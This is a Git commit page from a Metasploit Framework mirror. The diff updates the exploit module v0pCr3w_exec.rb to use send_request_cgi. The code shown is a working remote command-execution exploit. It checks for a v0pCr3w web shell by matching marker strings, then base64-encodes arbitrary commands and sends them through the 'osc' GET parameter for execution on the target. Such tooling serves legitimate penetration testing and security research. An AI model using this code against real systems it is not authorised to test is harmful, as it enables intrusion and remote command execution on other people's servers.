infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updated v0pCr3w_exec to use send_request_cgi

unstable
bwall 2013-03-26 01:33:30 -04:00
parent 5218831167
commit a5346240de
1 changed files with 15 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
modules/exploits/multi/misc/v0pCr3w_exec.rb
View File

@ -53,10 +53,13 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
uri = normalize_uri(datastore['URI']) shell = send_request_cgi({
uri += "?lol=1" 'method' => 'GET',
'uri' => normalize_uri(datastore['URI']),
shell = send_request_raw({'uri' => uri}, 25) 'vars_get' => {
'lol' => '1'
}
})
if (shell and shell.body =~ /v0pCr3w\<br\>/ and shell.body =~ /\<br\>nob0dyCr3w/) if (shell and shell.body =~ /v0pCr3w\<br\>/ and shell.body =~ /\<br\>nob0dyCr3w/)
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
end end
@ -64,10 +67,14 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def http_send_command(cmd, opts = {}) def http_send_command(cmd, opts = {})
p = Rex::Text.uri_encode(Rex::Text.encode_base64(cmd)) p = Rex::Text.encode_base64(cmd)
uri = normalize_uri(datastore['URI']) res = send_request_cgi({
uri += '?osc=' + p 'method' => 'GET',
res = send_request_raw({'uri' => uri}, 25) 'uri' => normalize_uri(datastore['URI']),
'vars_get' => {
'osc' => p
}
})
if not (res and res.code == 200) if not (res and res.code == 200)
fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.') fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.')
end end